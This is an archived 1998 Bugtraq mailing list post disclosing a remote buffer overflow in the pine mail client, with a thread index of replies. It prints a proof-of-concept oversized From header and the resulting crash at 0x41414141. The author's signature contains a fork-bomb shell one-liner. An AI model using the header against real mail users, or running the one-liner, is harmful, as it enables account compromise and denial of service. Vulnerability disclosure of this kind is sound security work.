Bugtraq mailing list archives
another remote pine vunerability
From: lcamtuf () BOSS STASZIC WAW PL (Michal Zalewski)
Date: Wed, 17 Jun 1998 16:57:28 +0200
Recently I found silly remote overflow in pine. It's so simple there's no need to describe it: From: Michal Zalewski <lcamtuf@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Emiliano Kargieman <ek () core-sdi com> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> ...and any attempt of reading this mail will cause: Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () It can be exploited to gain access to remote/local accounts. Fortunately, too long headers are destroyed by sendmail during prescan (maybe there's any way to split long line using encoding tricks): Jun 17 16:49:24 genome sendmail[689]: QAA00689: SYSERR(root): prescan: token too long But other mail daemons aren't so strict - it works. _______________________________________________________________________ Michal Zalewski [lcamtuf () boss staszic waw pl] <= finger for pub PGP key Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] [echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]
Current thread:
- Bind 4.9.6 ~ Current | X86 Exploit System Administrator (Jun 16)
- <Possible follow-ups>
- Re: Bind 4.9.6 ~ Current | X86 Exploit Sebastian Schoenberg (Jun 17)
- another remote pine vunerability Michal Zalewski (Jun 17)
- Re: another remote pine vunerability Phillip R. Jaenke (Jun 18)
- Re: another remote pine vunerability frank () sun01 ccii unipi it (Jun 18)
- Re: another remote pine vunerability Olivier Crete (Jun 18)
- Re: another remote pine vunerability Jason H. Reeves (Jun 18)
- Re: another remote pine vunerability Joan Garcia i Silano (Jun 18)
- another remote pine vunerability Michal Zalewski (Jun 17)
- Re: Bind 4.9.6 ~ Current | X86 Exploit Valentin Pavlov (Jun 18)